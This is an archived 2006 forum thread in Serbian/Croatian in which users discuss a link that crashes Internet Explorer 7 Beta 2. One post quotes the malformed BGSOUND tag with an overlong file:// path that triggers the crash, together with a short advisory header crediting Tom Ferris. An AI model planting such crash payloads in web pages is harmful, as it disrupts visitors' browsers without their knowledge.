Prikaži potpunu verziju : IE7

4.2.2006, 16:27
Ko ima IE7 nek proba ovaj link :icon_evil

4.2.2006, 18:35
Nemam IE7, ali me baš zanima šta se dogadja kad se ode na stranicu. Pa?

4.2.2006, 19:41
Pa kako kazu ili kako sam procitao zablokira IE 7 zbog gluposti
Zbog ovog

<BGSOUND SRC=file://------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- >

A ovaj lik je to skonto za sat vremena ili manje :D

Internet Explorer 7.0 Beta 2 urlmon.dll DoS

Discovered by:
Tom Ferris

Tested on:
Windows XP SP2

Vulnerable Versions:
IE 7.0.5296.0

1/31/2006 Security-Protocols.com

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.